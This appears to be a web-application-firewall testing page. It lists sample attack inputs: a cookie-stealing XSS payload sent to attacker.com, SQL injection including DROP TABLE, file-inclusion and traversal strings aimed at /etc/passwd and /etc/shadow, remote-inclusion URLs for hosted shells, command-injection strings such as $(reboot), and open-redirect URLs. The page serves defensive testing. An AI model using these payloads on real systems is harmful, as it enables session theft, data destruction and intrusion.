WAF Testing Page

Use this page to test WAF rules by submitting different inputs.

Example Query/Payload

• <script>document.location='http://attacker.com/cookie?c='+document.cookie</script>

Another Test Cases

Try submitting the following inputs to test different WAF rules:

Cross-Site Scripting (XSS Test)

• <script>alert('XSS')</script>
• "><script>alert('XSS')</script>
• <img src="x" onerror="alert('XSS')">
• <iframe src="javascript:alert('XSS')"></iframe>
• <svg onload="alert('XSS')"></svg>

SQL Injection (SQL Injection Test)

• SELECT * FROM users WHERE '1'='1'
• ' OR '1'='1' --
• " OR "1"="1" /*
• UNION SELECT null, null, null --
• 1'; DROP TABLE users; --
• SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'
• DROP TABLE users;

Local File Inclusion

• ../../../../etc/passwd
• /etc/passwd
• ../../windows/system32/drivers/etc/hosts
• ../../../../var/log/apache2/access.log
• ../../../boot.ini

Remote File Inclusion (RFI)

• http://www.tpimenta.xyz/malicious.php
• https://attacker.com/shell.txt
• https://evil.com/command.php
• data:text/plain;base64,PHNjcmlwdD5hbGVydCgnbWFsaWNpb3VzJyk8L3NjcmlwdD4=
• file:///etc/passwd

Command Injection

• ; ls -la
• && cat /etc/passwd
• | whoami
• $(reboot)
• ping -c 10 127.0.0.1

Directory Traversal

• ../../etc/passwd (Path Traversal Test)
• ./../../etc/passwd
• ../../../../../../../../../../etc/shadow
• /../../../../../../../../windows/system32/drivers/etc/hosts
• C:\windows\system32\cmd.exe
• /var/www/html/../../etc/passwd

Open Redirect

• /redirect?url=http://malicious.com
• /login?next=http://attacker.com
• /profile?url=//evil.com
• //example.com/%0Ahttp://evil.com
• http://127.0.0.1:[email protected]